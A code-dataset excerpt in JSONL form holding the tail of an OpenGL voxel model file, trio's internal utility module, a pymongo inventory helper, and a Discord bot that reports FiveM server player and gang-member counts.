glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, voxel_edge_indices.nbytes, voxel_edge_indices, GL_DYNAMIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert _model_data is not None\n assert isinstance(_model_data, VoxelsModelData)\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.array([[0.0, 1.0, 0.0]], dtype=np.float32))\n\n assert_debug(_model_data.voxel_points is not None)\n check_sizes(_model_data.voxel_points, [-1, 3])\n _model_data.voxel_points = _model_data.voxel_points.astype(np.float32)\n\n return _model_data\n","repo_name":"pierdell/pyviz3d","sub_path":"viz3d/opengl/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":35003,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} 
+{"seq_id":"27687746635","text":"# coding: utf-8\n\n# Little utilities we use internally\n\nfrom abc import ABCMeta\nimport os\nimport signal\nimport sys\nimport pathlib\nfrom functools import wraps, update_wrapper\nimport typing as t\nimport threading\nimport collections\n\nfrom async_generator import isasyncgen\n\nimport trio\n\n# Equivalent to the C function raise(), which Python doesn't wrap\nif os.name == \"nt\":\n # On windows, os.kill exists but is really weird.\n #\n # If you give it CTRL_C_EVENT or CTRL_BREAK_EVENT, it tries to deliver\n # those using GenerateConsoleCtrlEvent. But I found that when I tried\n # to run my test normally, it would freeze waiting... unless I added\n # print statements, in which case the test suddenly worked. So I guess\n # these signals are only delivered if/when you access the console? I\n # don't really know what was going on there. From reading the\n # GenerateConsoleCtrlEvent docs I don't know how it worked at all.\n #\n # I later spent a bunch of time trying to make GenerateConsoleCtrlEvent\n # work for creating synthetic control-C events, and... failed\n # utterly. There are lots of details in the code and comments\n # removed/added at this commit:\n # https://github.com/python-trio/trio/commit/95843654173e3e826c34d70a90b369ba6edf2c23\n #\n # OTOH, if you pass os.kill any *other* signal number... then CPython\n # just calls TerminateProcess (wtf).\n #\n # So, anyway, os.kill is not so useful for testing purposes. Instead\n # we use raise():\n #\n # https://msdn.microsoft.com/en-us/library/dwwzkt4c.aspx\n #\n # Have to import cffi inside the 'if os.name' block because we don't\n # depend on cffi on non-Windows platforms. (It would be easy to switch\n # this to ctypes though if we ever remove the cffi dependency.)\n #\n # Some more information:\n # https://bugs.python.org/issue26350\n #\n # Anyway, we use this for two things:\n # - redelivering unhandled signals\n # - generating synthetic signals for tests\n # and for both of those purposes, 'raise' works fine.\n import cffi\n\n _ffi = cffi.FFI()\n _ffi.cdef(\"int raise(int);\")\n _lib = _ffi.dlopen(\"api-ms-win-crt-runtime-l1-1-0.dll\")\n signal_raise = getattr(_lib, \"raise\")\nelse:\n\n def signal_raise(signum):\n signal.pthread_kill(threading.get_ident(), signum)\n\n\n# See: #461 as to why this is needed.\n# The gist is that threading.main_thread() has the capability to lie to us\n# if somebody else edits the threading ident cache to replace the main\n# thread; causing threading.current_thread() to return a _DummyThread,\n# causing the C-c check to fail, and so on.\n# Trying to use signal out of the main thread will fail, so we can then\n# reliably check if this is the main thread without relying on a\n# potentially modified threading.\ndef is_main_thread():\n \"\"\"Attempt to reliably check if we are in the main thread.\"\"\"\n try:\n signal.signal(signal.SIGINT, signal.getsignal(signal.SIGINT))\n return True\n except ValueError:\n return False\n\n\n######\n# Call the function and get the coroutine object, while giving helpful\n# errors for common mistakes. 
Returns coroutine object.\n######\ndef coroutine_or_error(async_fn, *args):\n def _return_value_looks_like_wrong_library(value):\n # Returned by legacy @asyncio.coroutine functions, which includes\n # a surprising proportion of asyncio builtins.\n if isinstance(value, collections.abc.Generator):\n return True\n # The protocol for detecting an asyncio Future-like object\n if getattr(value, \"_asyncio_future_blocking\", None) is not None:\n return True\n # This janky check catches tornado Futures and twisted Deferreds.\n # By the time we're calling this function, we already know\n # something has gone wrong, so a heuristic is pretty safe.\n if value.__class__.__name__ in (\"Future\", \"Deferred\"):\n return True\n return False\n\n try:\n coro = async_fn(*args)\n\n except TypeError:\n # Give good error for: nursery.start_soon(trio.sleep(1))\n if isinstance(async_fn, collections.abc.Coroutine):\n # explicitly close coroutine to avoid RuntimeWarning\n async_fn.close()\n\n raise TypeError(\n \"Trio was expecting an async function, but instead it got \"\n \"a coroutine object {async_fn!r}\\n\"\n \"\\n\"\n \"Probably you did something like:\\n\"\n \"\\n\"\n \" trio.run({async_fn.__name__}(...)) # incorrect!\\n\"\n \" nursery.start_soon({async_fn.__name__}(...)) # incorrect!\\n\"\n \"\\n\"\n \"Instead, you want (notice the parentheses!):\\n\"\n \"\\n\"\n \" trio.run({async_fn.__name__}, ...) # correct!\\n\"\n \" nursery.start_soon({async_fn.__name__}, ...) # correct!\".format(\n async_fn=async_fn\n )\n ) from None\n\n # Give good error for: nursery.start_soon(future)\n if _return_value_looks_like_wrong_library(async_fn):\n raise TypeError(\n \"Trio was expecting an async function, but instead it got \"\n \"{!r} – are you trying to use a library written for \"\n \"asyncio/twisted/tornado or similar? That won't work \"\n \"without some sort of compatibility shim.\".format(async_fn)\n ) from None\n\n raise\n\n # We can't check iscoroutinefunction(async_fn), because that will fail\n # for things like functools.partial objects wrapping an async\n # function. So we have to just call it and then check whether the\n # return value is a coroutine object.\n if not isinstance(coro, collections.abc.Coroutine):\n # Give good error for: nursery.start_soon(func_returning_future)\n if _return_value_looks_like_wrong_library(coro):\n raise TypeError(\n \"Trio got unexpected {!r} – are you trying to use a \"\n \"library written for asyncio/twisted/tornado or similar? \"\n \"That won't work without some sort of compatibility shim.\".format(coro)\n )\n\n if isasyncgen(coro):\n raise TypeError(\n \"start_soon expected an async function but got an async \"\n \"generator {!r}\".format(coro)\n )\n\n # Give good error for: nursery.start_soon(some_sync_fn)\n raise TypeError(\n \"Trio expected an async function, but {!r} appears to be \"\n \"synchronous\".format(getattr(async_fn, \"__qualname__\", async_fn))\n )\n\n return coro\n\n\nclass ConflictDetector:\n \"\"\"Detect when two tasks are about to perform operations that would\n conflict.\n\n Use as a synchronous context manager; if two tasks enter it at the same\n time then the second one raises an error. 
You can use it when there are\n    two pieces of code that *would* collide and need a lock if they ever were\n    called at the same time, but that should never happen.\n\n    We use this in particular for things like, making sure that two different\n    tasks don't call sendall simultaneously on the same stream.\n\n    \"\"\"\n\n    def __init__(self, msg):\n        self._msg = msg\n        self._held = False\n\n    def __enter__(self):\n        if self._held:\n            raise trio.BusyResourceError(self._msg)\n        else:\n            self._held = True\n\n    def __exit__(self, *args):\n        self._held = False\n\n\ndef async_wraps(cls, wrapped_cls, attr_name):\n    \"\"\"Similar to wraps, but for async wrappers of non-async functions.\"\"\"\n\n    def decorator(func):\n        func.__name__ = attr_name\n        func.__qualname__ = \".\".join((cls.__qualname__, attr_name))\n\n        func.__doc__ = \"\"\"Like :meth:`~{}.{}.{}`, but async.\n\n        \"\"\".format(\n            wrapped_cls.__module__, wrapped_cls.__qualname__, attr_name\n        )\n\n        return func\n\n    return decorator\n\n\ndef fixup_module_metadata(module_name, namespace):\n    seen_ids = set()\n\n    def fix_one(qualname, name, obj):\n        # avoid infinite recursion (relevant when using\n        # typing.Generic, for example)\n        if id(obj) in seen_ids:\n            return\n        seen_ids.add(id(obj))\n\n        mod = getattr(obj, \"__module__\", None)\n        if mod is not None and mod.startswith(\"trio.\"):\n            obj.__module__ = module_name\n            # Modules, unlike everything else in Python, put fully-qualified\n            # names into their __name__ attribute. We check for \".\" to avoid\n            # rewriting these.\n            if hasattr(obj, \"__name__\") and \".\" not in obj.__name__:\n                obj.__name__ = name\n                obj.__qualname__ = qualname\n            if isinstance(obj, type):\n                for attr_name, attr_value in obj.__dict__.items():\n                    fix_one(qualname + \".\" + attr_name, attr_name, attr_value)\n\n    for objname, obj in namespace.items():\n        if not objname.startswith(\"_\"): # ignore private attributes\n            fix_one(objname, objname, obj)\n\n\nclass generic_function:\n    \"\"\"Decorator that makes a function indexable, to communicate\n    non-inferrable generic type parameters to a static type checker.\n\n    If you write::\n\n        @generic_function\n        def open_memory_channel(max_buffer_size: int) -> Tuple[\n            SendChannel[T], ReceiveChannel[T]\n        ]: ...\n\n    it is valid at runtime to say ``open_memory_channel[bytes](5)``.\n    This behaves identically to ``open_memory_channel(5)`` at runtime,\n    and currently won't type-check without a mypy plugin or clever stubs,\n    but at least it becomes possible to write those.\n    \"\"\"\n\n    def __init__(self, fn):\n        update_wrapper(self, fn)\n        self._fn = fn\n\n    def __call__(self, *args, **kwargs):\n        return self._fn(*args, **kwargs)\n\n    def __getitem__(self, _):\n        return self\n\n\nclass Final(ABCMeta):\n    \"\"\"Metaclass that enforces a class to be final (i.e., subclass not allowed).\n\n    If a class uses this metaclass like this::\n\n        class SomeClass(metaclass=Final):\n            pass\n\n    The metaclass will ensure that no sub class can be created.\n\n    Raises\n    ------\n    - TypeError if a sub class is created\n    \"\"\"\n\n    def __new__(cls, name, bases, cls_namespace):\n        for base in bases:\n            if isinstance(base, Final):\n                raise TypeError(\n                    f\"{base.__module__}.{base.__qualname__} does not support subclassing\"\n                )\n        return super().__new__(cls, name, bases, cls_namespace)\n\n\nT = t.TypeVar(\"T\")\n\n\nclass NoPublicConstructor(Final):\n    \"\"\"Metaclass that enforces a class to be final (i.e., subclass not allowed)\n    and ensures a private constructor.\n\n    If a class uses this metaclass like this::\n\n        class SomeClass(metaclass=NoPublicConstructor):\n            
pass\n\n The metaclass will ensure that no sub class can be created, and that no instance\n can be initialized.\n\n If you try to instantiate your class (SomeClass()), a TypeError will be thrown.\n\n Raises\n ------\n - TypeError if a sub class or an instance is created.\n \"\"\"\n\n def __call__(cls, *args, **kwargs):\n raise TypeError(\n f\"{cls.__module__}.{cls.__qualname__} has no public constructor\"\n )\n\n def _create(cls: t.Type[T], *args: t.Any, **kwargs: t.Any) -> T:\n return super().__call__(*args, **kwargs) # type: ignore\n\n\ndef name_asyncgen(agen):\n \"\"\"Return the fully-qualified name of the async generator function\n that produced the async generator iterator *agen*.\n \"\"\"\n if not hasattr(agen, \"ag_code\"): # pragma: no cover\n return repr(agen)\n try:\n module = agen.ag_frame.f_globals[\"__name__\"]\n except (AttributeError, KeyError):\n module = \"<{}>\".format(agen.ag_code.co_filename)\n try:\n qualname = agen.__qualname__\n except AttributeError:\n qualname = agen.ag_code.co_name\n return f\"{module}.{qualname}\"\n","repo_name":"cwyrwas/ChatGPT-Content-Generator","sub_path":".venv/Lib/site-packages/trio/_util.py","file_name":"_util.py","file_ext":"py","file_size_in_byte":11997,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"61"} +{"seq_id":"33618402959","text":"#dbTools\n#Database and data handling logic module for inventoryApp\n\nimport pymongo\nimport modules.config as config\n\nclient = pymongo.MongoClient(config.dbString)\ndb = client[config.dbName]\nstacks = db['stacks']\nlocations = db['locations']\nitems = db['items']\n\n\nclass stack:\n\n def __init__(self, part, qty, batch, expiration, unit, location):\n self.partNumber=part #string\n self.qty = qty #float\n self.batch = batch #string\n self.expiration = expiration #datetime or zero for non expiring\n self.unit = unit #string\n self.location = location #string\n\n def updateQty(self, amount):\n self.qty += amount\n \n def pushStackRecord(self, coll):\n print(\"creating stack record....\")\n rec = {\n 'partNumber': self.partNumber,\n 'qty': self.qty,\n 'unit': self.unit,\n 'batch': self.batch,\n 'expiration': self.expiration,\n 'location' : self.location\n }\n print(\"Pushing stack record....\")\n x = coll.insert_one(rec)\n print(\"Push Complete....\")\n\nclass item:\n def __init__(self, partNum, description, expiration, unit):\n self.partNum = partNum #string\n self.description = description #string\n self.expiration = expiration #datetime or zero for non expiring\n self.unit = unit #string\n\n def pushItemRecord(self, coll):\n print(\"creating item record....\")\n rec = {\n 'partNumber': self.partNum,\n 'description': self.description,\n 'expiration' : self.expiration,\n 'unit' : self.unit\n }\n print(\"Pushing item record....\")\n x = coll.insert_one(rec)\n print(\"Push Complete....\")\n\nclass location:\n def __init__(self, locationName, storageType, warehouse):\n self.locationName = locationName\n self.storageType = storageType\n self.warehouse = warehouse\n\n def pushLocationRecord(self, coll):\n print(\"Creating location record....\")\n rec = {\n 'locationName':self.locationName,\n 'storageType':self.storageType,\n 'warehouse':self.warehouse\n }\n print(\"Pushing location record....\")\n x = coll.insert_one(rec)\n print(\"Push Complete....\")\n\ndef getStockList(query):\n if query == None:\n res = list(stacks.find())\n else:\n res = list(stacks.find({\"$or\":[{\"partNumber\": query}, {\"batch\": query}, {\"location\": query}]}))\n \n return 
res\n\ndef getItemList(query):\n    if query == None:\n        res = list(items.find())\n    else:\n        res = list(items.find({\"$or\":[{\"partNumber\": query}, {\"description\": query}]}))\n    \n    return res\n\ndef getLocationList(query):\n    if query == None:\n        res = list(locations.find())\n    else:\n        res = list(locations.find({\"locationName\": query}))\n    \n    return res\n\ndef itemExists(query):\n    res = list(items.find({'partNumber': query}))\n    if len(res) > 0:\n        return True\n    else:\n        return False\n\ndef locationExists(query):\n    res = list(locations.find({'locationName': query}))\n    if len(res) > 0:\n        return True\n    else:\n        return False","repo_name":"jqa7288/inventoryProject","sub_path":"app/modules/dbTools.py","file_name":"dbTools.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3932757445","text":"import asyncio\nfrom http import client\nimport http.client\nimport json\nimport logging\nimport os\nimport platform\nimport random\nimport sys\n\nimport aiosqlite\nimport discord\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import Bot, Context\nfrom datetime import datetime\nfrom urllib.request import Request, urlopen\n\nimport exceptions\n\nif not os.path.isfile(f\"{os.path.realpath(os.path.dirname(__file__))}/config.json\"):\n    sys.exit(\"'config.json' not found! Please add it and try again.\")\nelse:\n    with open(f\"{os.path.realpath(os.path.dirname(__file__))}/config.json\") as file:\n        config = json.load(file)\n\n\"\"\"\t\nSetup bot intents (events restrictions)\nFor more information about intents, please go to the following websites:\nhttps://discordpy.readthedocs.io/en/latest/intents.html\nhttps://discordpy.readthedocs.io/en/latest/intents.html#privileged-intents\n\n\nDefault Intents:\nintents.bans = True\nintents.dm_messages = True\nintents.dm_reactions = True\nintents.dm_typing = True\nintents.emojis = True\nintents.emojis_and_stickers = True\nintents.guild_messages = True\nintents.guild_reactions = True\nintents.guild_scheduled_events = True\nintents.guild_typing = True\nintents.guilds = True\nintents.integrations = True\nintents.invites = True\nintents.messages = True # `message_content` is required to get the content of the messages\nintents.reactions = True\nintents.typing = True\nintents.voice_states = True\nintents.webhooks = True\n\nPrivileged Intents (Needs to be enabled on developer portal of Discord), please use them only if you need them:\nintents.members = True\nintents.message_content = True\nintents.presences = True\n\"\"\"\n\nintents = discord.Intents.default()\n\n\"\"\"\nUncomment this if you want to use prefix (normal) commands.\nIt is recommended to use slash commands and therefore not use prefix commands.\n\nIf you want to use prefix commands, make sure to also enable the intent below in the Discord developer portal.\n\"\"\"\nintents.messages = True\n\nbot = Bot(command_prefix=commands.when_mentioned_or(\n    config[\"prefix\"]), intents=intents, help_command=None)\n\n# Setup both of the loggers\nclass LoggingFormatter(logging.Formatter):\n    # Colors\n    black = \"\\x1b[30m\"\n    red = \"\\x1b[31m\"\n    green = \"\\x1b[32m\"\n    yellow = \"\\x1b[33m\"\n    blue = \"\\x1b[34m\"\n    gray = \"\\x1b[38m\"\n    # Styles\n    reset = \"\\x1b[0m\"\n    bold = \"\\x1b[1m\"\n\n    COLORS = {\n        logging.DEBUG: gray + bold,\n        logging.INFO: blue + bold,\n        logging.WARNING: yellow + bold,\n        logging.ERROR: red,\n        logging.CRITICAL: red + bold\n    }\n\n    def format(self, record):\n        log_color = 
self.COLORS[record.levelno]\n format = \"(black){asctime}(reset) (levelcolor){levelname:<8}(reset) (green){name}(reset) {message}\"\n format = format.replace(\"(black)\", self.black + self.bold)\n format = format.replace(\"(reset)\", self.reset)\n format = format.replace(\"(levelcolor)\", log_color)\n format = format.replace(\"(green)\", self.green + self.bold)\n formatter = logging.Formatter(format, \"%Y-%m-%d %H:%M:%S\", style=\"{\")\n return formatter.format(record)\n\n\nlogger = logging.getLogger(\"discord_bot\")\nlogger.setLevel(logging.INFO)\n\n# Console handler\nconsole_handler = logging.StreamHandler()\nconsole_handler.setFormatter(LoggingFormatter())\n# File handler\nfile_handler = logging.FileHandler(\n filename=\"discord.log\", encoding=\"utf-8\", mode=\"w\")\nfile_handler_formatter = logging.Formatter(\n \"[{asctime}] [{levelname:<8}] {name}: {message}\", \"%Y-%m-%d %H:%M:%S\", style=\"{\")\nfile_handler.setFormatter(file_handler_formatter)\n\n# Add the handlers\nlogger.addHandler(console_handler)\nlogger.addHandler(file_handler)\nbot.logger = logger\n\n\nasync def init_db():\n async with aiosqlite.connect(f\"{os.path.realpath(os.path.dirname(__file__))}/database/database.db\") as db:\n with open(f\"{os.path.realpath(os.path.dirname(__file__))}/database/schema.sql\") as file:\n await db.executescript(file.read())\n await db.commit()\n\n\n\"\"\"\nCreate a bot variable to access the config file in cogs so that you don't need to import it every time.\n\nThe config is available using the following code:\n- bot.config # In this file\n- self.bot.config # In cogs\n\"\"\"\nbot.config = config\nguild_id = 0\n\n@bot.event\nasync def on_ready() -> None:\n \"\"\"\n The code in this event is executed when the bot is ready.\n \"\"\"\n bot.logger.info(f\"Logged in as {bot.user.name}\")\n bot.logger.info(f\"discord.py API version: {discord.__version__}\")\n bot.logger.info(f\"Python version: {platform.python_version()}\")\n bot.logger.info(\n f\"Running on: {platform.system()} {platform.release()} ({os.name})\")\n bot.logger.info(\"-------------------\")\n if config[\"sync_commands_globally\"]:\n bot.logger.info(\"Syncing commands globally...\")\n await bot.tree.sync()\n\n@bot.event\nasync def on_guild_join(guild):\n path = \"serverSetting/\" + str(guild.id)\n try:\n global guild_id\n guild_id = guild.id\n os.makedirs(path)\n print(\"Making dir:\" + path)\n json_dict = {\n \"guild_id\": guild.id,\n \"guild_data\": {\n \"normal_data\": {\n \"message_id\": 0,\n \"old_message_id\": 0,\n \"serverInviteId\": \"\",\n \"channelId\": 0\n },\n \"embed_data\": {\n \"embedTitle\": \":pencil: Server Statistics\",\n \"embedServerName\": \"\",\n \"embedGangName\": \"\" \n }\n }\n }\n json_object = json.dumps(json_dict, indent=4)\n with open(f\"./serverSetting/{str(guild.id)}/settings.json\", \"w\") as f:\n f.write(json_object)\n # if the dir exist\n except FileExistsError:\n print(\"Dir exist \" + path)\n\n# @tasks.loop(minutes=1.0)\n# async def status_task() -> None:\n# \"\"\"\n# Setup the game status task of the bot.\n# \"\"\"\n# statuses = [\"\", \"with Krypton!\", \"with humans!\"]\n# await bot.change_presence(activity=discord.Game(random.choice(statuses)))\n\n\n@bot.event\nasync def on_message(message: discord.Message) -> None:\n \"\"\"\n The code in this event is executed every time someone sends a message, with or without the prefix\n\n :param message: The message that was sent.\n \"\"\"\n if message.author == bot.user or message.author.bot:\n return\n await 
bot.process_commands(message)\n\n\n@bot.event\nasync def on_command_completion(context: Context) -> None:\n \"\"\"\n The code in this event is executed every time a normal command has been *successfully* executed.\n\n :param context: The context of the command that has been executed.\n \"\"\"\n full_command_name = context.command.qualified_name\n split = full_command_name.split(\" \")\n executed_command = str(split[0])\n if context.guild is not None:\n bot.logger.info(\n f\"Executed {executed_command} command in {context.guild.name} (ID: {context.guild.id}) by {context.author} (ID: {context.author.id})\")\n else:\n bot.logger.info(\n f\"Executed {executed_command} command by {context.author} (ID: {context.author.id}) in DMs\")\n\n\n@bot.event\nasync def on_command_error(context: Context, error) -> None:\n \"\"\"\n The code in this event is executed every time a normal valid command catches an error.\n\n :param context: The context of the normal command that failed executing.\n :param error: The error that has been faced.\n \"\"\"\n if isinstance(error, commands.CommandOnCooldown):\n minutes, seconds = divmod(error.retry_after, 60)\n hours, minutes = divmod(minutes, 60)\n hours = hours % 24\n embed = discord.Embed(\n description=f\"**Please slow down** - You can use this command again in {f'{round(hours)} hours' if round(hours) > 0 else ''} {f'{round(minutes)} minutes' if round(minutes) > 0 else ''} {f'{round(seconds)} seconds' if round(seconds) > 0 else ''}.\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n elif isinstance(error, exceptions.UserBlacklisted):\n \"\"\"\n The code here will only execute if the error is an instance of 'UserBlacklisted', which can occur when using\n the @checks.not_blacklisted() check in your command, or you can raise the error by yourself.\n \"\"\"\n embed = discord.Embed(\n description=\"You are blacklisted from using the bot!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n bot.logger.warning(\n f\"{context.author} (ID: {context.author.id}) tried to execute a command in the guild {context.guild.name} (ID: {context.guild.id}), but the user is blacklisted from using the bot.\")\n elif isinstance(error, exceptions.UserNotOwner):\n \"\"\"\n Same as above, just for the @checks.is_owner() check.\n \"\"\"\n embed = discord.Embed(\n description=\"You are not the owner of the bot!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n bot.logger.warning(\n f\"{context.author} (ID: {context.author.id}) tried to execute an owner only command in the guild {context.guild.name} (ID: {context.guild.id}), but the user is not an owner of the bot.\")\n elif isinstance(error, commands.MissingPermissions):\n embed = discord.Embed(\n description=\"You are missing the permission(s) `\" + \", \".join(\n error.missing_permissions) + \"` to execute this command!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n elif isinstance(error, commands.BotMissingPermissions):\n embed = discord.Embed(\n description=\"I am missing the permission(s) `\" + \", \".join(\n error.missing_permissions) + \"` to fully perform this command!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n elif isinstance(error, commands.MissingRequiredArgument):\n embed = discord.Embed(\n title=\"Error!\",\n # We need to capitalize because the command arguments have no capital letter in the code.\n description=str(error).capitalize(),\n color=0xE02B2B\n )\n await context.send(embed=embed)\n else:\n raise error\n\n\nasync def load_cogs() -> None:\n \"\"\"\n The code in this 
function is executed whenever the bot will start.\n \"\"\"\n for file in os.listdir(f\"{os.path.realpath(os.path.dirname(__file__))}/cogs\"):\n if file.endswith(\".py\"):\n extension = file[:-3]\n try:\n await bot.load_extension(f\"cogs.{extension}\")\n bot.logger.info(f\"Loaded extension '{extension}'\")\n except Exception as e:\n exception = f\"{type(e).__name__}: {e}\"\n bot.logger.error(\n f\"Failed to load extension {extension}\\n{exception}\") \n\n# embedTitle = \":pencil: Server Statistics\"\n# embedServerName = \"\"\n# embedGangName = \"\"\n# embedServerCount = \"\"\nembedGangCount = []\ngangDiscordId = []\nserverDiscordId = []\n# message_id = 0\n# old_message_id = 0\n# serverIviteId = \"\"\n# channelId = 0\n\n\ndef getJsonData():\n with open(f\"./serverSetting/{str(guild_id)}/settings.json\", \"r\") as f:\n return json.loads(f.read()) \n\ndef getData():\n def get_page_content(url, head):\n \"\"\"\n Function to get the page content\n \"\"\"\n req = Request(url, headers=head)\n return urlopen(req)\n \n url = 'https://servers-frontend.fivem.net/api/servers/single/'+getJsonData()['guild_data']['normal_data']['serverInviteId']\n head = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive',\n }\n\n data = get_page_content(url, head).read()\n newData = data.decode(\"utf-8\").replace(\"'\", '\"')\n jsonData = json.loads(newData)\n realData = json.loads(json.dumps(jsonData))\n\n return realData\n\ndef getPlayerCount():\n data_json = getData()['Data']\n return f\"{data_json['clients']}/{data_json['sv_maxclients']}\"\n\ndef getGangCount():\n global serverDiscordId\n global embedGangCount\n\n data_json = getData()['Data']['players']\n \n for i in range(len(data_json)):\n for j in range(len(data_json[i]['identifiers'])):\n if 'discord' in (data_json[i]['identifiers'][j]):\n serverDiscordId.append(int(data_json[i]['identifiers'][j].split(':')[1]))\n\n for i in range(len(gangDiscordId)):\n if gangDiscordId[i] in serverDiscordId and gangDiscordId[i] not in embedGangCount:\n embedGangCount.append(gangDiscordId[i])\n\n return embedGangCount\n\n@bot.command()\nasync def help(ctx):\n global guild_id\n guild_id = ctx.guild.id\n embed=discord.Embed(title=\":book: Help Documentation\", description=\"Execute the following commands in order to set up the bot!\",color=0xffffff)\n\n embed.add_field(name=\"!setinvite [server invite code] e.g. zb8lmd\", value=\"\", inline=False)\n embed.add_field(name=\"!setchannel [tag channel] e.g. #general\", value=\"\", inline=False)\n embed.add_field(name=\"!setup [server name] [gang name]\", value=\"\", inline=False)\n embed.add_field(name=\"!role [tag universal role of members] e.g. 
@role\", value=\"\", inline=False)\n embed.add_field(name=\"!run\", value=\"\", inline=False)\n embed.add_field(name=\"\", value=\"server & gang name and role must be set up to execute run\", inline=False)\n embed.add_field(name=\"\", value=\"dont include square brackets in the setup and role\", inline=False)\n\n embed.set_footer(text=f\"Created by yne#2654.\")\n\n await ctx.send(embed=embed)\n\n@bot.command()\nasync def reset(ctx):\n json_dict = {\n \"guild_id\": ctx.guild.id,\n \"guild_data\": {\n \"normal_data\": {\n \"message_id\": 0,\n \"old_message_id\": 0,\n \"serverInviteId\": \"\",\n \"channelId\": 0\n },\n \"embed_data\": {\n \"embedTitle\": \":pencil: Server Statistics\",\n \"embedServerName\": \"\",\n \"embedGangName\": \"\" \n }\n }\n }\n json_object = json.dumps(json_dict, indent=4)\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as f:\n f.truncate()\n f.write(json_object)\n\n@bot.command()\nasync def setinvite(ctx, serverId):\n global guild_id\n guild_id = ctx.guild.id\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['normal_data']['serverInviteId'] = serverId\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n@bot.command()\nasync def setchannel(ctx, channel: discord.TextChannel):\n global guild_id\n guild_id = ctx.guild.id\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['normal_data']['channelId'] = channel.id\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n@bot.command()\nasync def setup(ctx, *args):\n global guild_id\n guild_id = ctx.guild.id\n embedServerName = (args[0])\n embedGangName = (args[1])\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['embed_data']['embedServerName'] = embedServerName\n data['guild_data']['embed_data']['embedGangName'] = embedGangName\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n #await ctx.send(ctx.message.guild.name)\n\n@bot.command()\nasync def role(ctx, role: discord.Role):\n global guild_id\n guild_id = ctx.guild.id\n global gangDiscordId\n if role in ctx.message.author.roles:\n gangDiscordId.append(ctx.message.id)\n for user in ctx.guild.members:\n if role in user.roles:\n gangDiscordId.append(user.id)\n\n@bot.command()\nasync def run(ctx):\n global guild_id\n guild_id = ctx.guild.id\n getJsonDataArr = getJsonData()\n if getJsonDataArr['guild_data']['embed_data']['embedServerName'] == \"\" or getJsonDataArr['guild_data']['embed_data']['embedGangName'] == \"\" or getJsonDataArr['guild_data']['normal_data']['channelId'] == 0 or getJsonDataArr['guild_data']['normal_data']['serverInviteId'] == 0: await ctx.send('Please setup the required details!')\n else:\n embedServerCount = getPlayerCount()\n embedGangCount = getGangCount()\n now = datetime.now()\n embed=discord.Embed(title=f\"{getJsonDataArr['guild_data']['embed_data']['embedTitle']}\", color=0xffffff)\n\n embed.add_field(name=f\"{getJsonDataArr['guild_data']['embed_data']['embedServerName']} Player Count: {embedServerCount}\", value=\"\", inline=False)\n embed.add_field(name=f\"In City {getJsonDataArr['guild_data']['embed_data']['embedGangName']} Count: {len(embedGangCount)}\", value=\"\", inline=False)\n\n embed.set_footer(text=f\"Created by yne#2654. 
Last refresh at {now}\")\n\n if (getJsonDataArr['guild_data']['normal_data']['old_message_id'] != 0 and ctx.channel.id == getJsonDataArr['guild_data']['normal_data']['channelId']) :\n run_count_background.stop()\n msg = await ctx.fetch_message(getJsonDataArr['guild_data']['normal_data']['old_message_id'])\n await msg.delete() \n\n message = await ctx.send(embed=embed)\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['normal_data']['message_id'] = message.id\n data['guild_data']['normal_data']['old_message_id'] = message.id\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n if not run_count_background.is_running():\n run_count_background.start()\n\n@tasks.loop(seconds=60.0)\nasync def run_count_background():\n getJsonDataArr = getJsonData()\n embedServerCount = getPlayerCount()\n embedGangCount = getGangCount()\n now = datetime.now()\n newEmbed=discord.Embed(title=f\"{getJsonDataArr['guild_data']['embed_data']['embedTitle']}\", color=0xffffff)\n\n newEmbed.add_field(name=f\"{getJsonDataArr['guild_data']['embed_data']['embedServerName']} Player Count: {embedServerCount}\", value=\"\", 